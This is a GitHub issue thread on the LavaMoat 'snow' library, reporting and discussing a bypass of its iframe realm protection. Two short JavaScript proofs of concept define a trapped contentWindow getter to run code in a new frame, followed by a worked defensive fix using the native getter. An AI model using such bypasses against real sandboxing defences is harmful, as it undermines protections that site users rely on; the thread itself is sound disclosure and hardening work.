LavaMoat / snow

Use Snow to finally secure your web app's same origin realms!
https://lavamoat.github.io/snow/demo/
MIT License
102 stars 9 forks

Bypass by making contentWindow throw an exception #98

Closed mmndaniel closed 1 year ago

mmndaniel commented 1 year ago

var f = document.createElement('iframe');
Object.defineProperty(f, 'contentWindow', {
    get: function() {
        throw new Error('pwnd');
    }
});
try {
    document.body.appendChild(f);
} catch (e) {}
frames[0].alert(1);

This is what I mean here, but actually exploits the Chromium bug workaround this time :)

weizman commented 1 year ago

Even worse, this contentWindow access can be trapped completely

var f = document.createElement('iframe');
Object.defineProperty(f, 'contentWindow', {
    get: function() {
        window[0].alert(1)
    }
});
document.body.appendChild(f);

Which is a problem on one hand, but can't see a way around it atm...

mmndaniel commented 1 year ago

Can't you use the native getter? var _get = Object.getOwnPropertyDescriptor(HTMLIFrameElement.prototype, 'contentWindow').get (same with embed, etc.). I guess the question is if it will make it appear in frames.
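The native-getter idea above, worked through as an added example (not code from the Snow project or from either commenter): the getter for contentWindow is captured from HTMLIFrameElement.prototype once, before untrusted page code runs, and is then invoked with the element as receiver, so an own-property trap defined on the element instance (whether it throws or runs code) is never consulted. A second helper detects such a trap, since the browser never creates an own contentWindow property on an iframe element. In a browser the real HTMLIFrameElement is used; under Node, where there is no DOM, a constructed stand-in with the same prototype-getter shape is assumed so the block runs offline.

```javascript
// Added example (not the Snow project's code): read an iframe's contentWindow
// through the prototype getter so an own-property trap on the instance cannot
// intercept the access or throw on it.

// Real HTMLIFrameElement in a browser; in Node a constructed stand-in whose
// contentWindow getter lives on the prototype, mirroring the DOM shape.
const IFrameCtor = (typeof HTMLIFrameElement === 'function')
  ? HTMLIFrameElement
  : (function () {
      function FakeIFrame(win) { this._win = win; } // hypothetical stand-in
      Object.defineProperty(FakeIFrame.prototype, 'contentWindow', {
        get() { return this._win; },
        configurable: true,
        enumerable: true,
      });
      return FakeIFrame;
    })();

// Capture the native getter once, before any page script can run.
const nativeContentWindowGet =
  Object.getOwnPropertyDescriptor(IFrameCtor.prototype, 'contentWindow').get;

// Hardened accessor: apply the captured prototype getter directly, so an own
// 'contentWindow' property defined on the element is never looked up.
function getContentWindowSafely(el) {
  return Reflect.apply(nativeContentWindowGet, el, []);
}

// Detection: the browser never defines 'contentWindow' as an own property of
// an iframe element, so an own descriptor means the element was tampered with.
function hasTrappedContentWindow(el) {
  return Object.getOwnPropertyDescriptor(el, 'contentWindow') !== undefined;
}

// Element factory: real iframe in a browser (contentWindow is null while
// detached), stand-in carrying a constructed placeholder realm otherwise.
function makeElement(win) {
  if (typeof document !== 'undefined' && IFrameCtor === globalThis.HTMLIFrameElement) {
    return document.createElement('iframe');
  }
  return new IFrameCtor(win);
}

// Constructed scenario: an own getter that throws, as in the issue report,
// is installed on the element; the hardened accessor must not trigger it.
function demo() {
  const realm = { marker: 'real-realm' }; // constructed placeholder window
  const el = makeElement(realm);
  let trapFired = false;
  Object.defineProperty(el, 'contentWindow', {
    get() { trapFired = true; throw new Error('trapped'); },
    configurable: true,
  });
  const viaNative = getContentWindowSafely(el);
  return {
    tampered: hasTrappedContentWindow(el), // true: own property present
    trapFired,                             // false: prototype getter used
    nativeResult: viaNative,               // the placeholder realm under Node
  };
}
```

Under Node, demo() reports the trap as detected while the native read still returns the stand-in realm without the trap firing; in a browser the same call returns null for the detached iframe, which is the native behaviour rather than the trap's. Capturing the descriptor early matters: if page code redefines HTMLIFrameElement.prototype.contentWindow before the capture, the captured getter is the attacker's, so this belongs at the very start of the protecting script.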

weizman commented 1 year ago

So after some research, the Chromium bug is different than I thought, but that's good news. It doesn't require access specifically to contentWindow, but a broader and more abstract manipulation on the object. Luckily (for a reason I don't understand), running Object.getOwnPropertyDescriptor(frame, 'xxx') on it works too (and, in contrast to the former method, this one cannot be trapped).